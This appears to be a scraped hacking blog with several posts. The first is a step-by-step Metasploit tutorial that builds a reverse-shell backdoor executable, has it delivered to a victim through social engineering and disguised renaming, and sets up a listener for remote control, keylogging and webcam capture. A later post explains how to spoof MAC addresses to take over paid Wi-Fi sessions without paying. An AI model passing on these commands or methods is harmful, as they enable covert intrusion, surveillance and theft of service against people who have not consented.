Hack Windows 7 with Metasploit

In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework

Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:


msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe


I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.5

set lport 4444

exploit 

If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

[it,s cool to take a screenshot with meterpreter command screenshot. ]
Regards:
 Akash Soni

How to find a vulnerable Website?

Website security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating a lot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.
Few years back their existed no proper tools search for vulnerability , but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking

 Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:


1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack




By: Akash Soni

Hacking & Network Security: What Is It Exactly (For Noobs)

It is not strange to call this generation as “intelligent” generation, the era of computers & internet. Humans are connected to each other through the world of computers spread over a network.
Essentially, in technical language, Computers communicate with each other through network. So any data communication between 2 or more computers involves transfer, sharing of vital data. The basic idea of networks is allow people remote access to geographically distant resources without having to be physically present. It has also been designed to send data back and forth, to stay connected.
There are large networks and small networks, but size is irrelevant in terms of importance of network security. The purpose of network security, quite simply, is to protect the network and its component parts from unauthorized access and misuse. Networks are vulnerable because of their inherent characteristic of facilitating remote access. For example, if a hacker wanted to access a computer not on a network, physical access would be vital. However, with networks in the picture, it is possible to bypass that particular security aspect. Therefore, it is vital for any network administrator, regardless of the size and type of network, to implement stringent security policies to prevent potential
losses.
The networks are computer networks, both public and private, that are used every day to conduct transactions and communications among businesses, government agencies and individuals. Today, most companies’ host computers can be accessed by their employees whether in their offices over a private communications network, or from their homes or hotel rooms while on the road through normal telephone lines.
Network security involves all activities that organizations, enterprises, and institutions undertake to protect the value and ongoing usability of assets and the integrity and continuity of operations. An effective network security strategy requires identifying threats and then choosing the most effective set of tools to combat them. Often important data is transferred from one computer system to other over the network. Network security safeguards the data communication so that vital information data is secured.
Whenever the word network security appears, it appears in conjunction with another popular buzzword “Ethical hacking”. The word “ethical” has special meaning as ethical hacking is very closely related to network security & is simply the use of programming skills to determine vulnerabilities in computer systems. Performed by special computer programming experts or hackers, it is very vital for the computers connected over network. With increasing use of the Internet and concerns about its security, especially when it comes to things like consumer information or private medical details, there is considerable need for computer experts to work in ethical hacking.
This is the guest post & Following is the Author Bio : Internet hacking is accessing a secure computer system by disabling or bypassing the security through internet. There are many ethical hacking tutorials available with which one can learn the ways of detecting the loopholes in cyber security.

What Exactly is Session Hijacking in Hacking ?

Session hijacking is widely used method by hackers for temporarily stealing network connections or login sessions. You might have heard this term used a lot by hackers & some of you have emailed me to explain it in brief.

So this post will explain you what exactly is session hijacking & I have written another one for hacking wireless hotspot using session hijacking step by step for understanding the concept.

What is Session

We see lot of Wireless network services offering us to use Wi Fi based on pay per use model – where you have to pay for usage and it costs really high but gives you high speed connectivity.

Evry user that pays for the service get connected. A unique MAC address of his laptop/netbook is stored in Service providers database for every paid user. Every time he gets connected to the paid network it creates a session and Session ID.

Every other user do not having authenticated MAC address and Session gets no connectivity. So this unique connection between user & wireless connectivity provider is session.

Black hat hackers have been using this technique from a long time to get unauthorized access to Paid Wi Fi network.

What is Session Stealing

In session hijacking we create a fake MAC address on our network interface & replace it with original one that we have by using MAC changer utility. And the fake MAC address that we are using is of certain user who is on the network &has already paid the wireless network usage.

So we spoof the MAC address & let network determine us through his MAC address as authenticated user. This is what we call Session Stealing or Hijacking.

Hello Friends Let's share our experiance against Beginner

What is necessary tools for the hacking any stuff ? - can any body give answer ??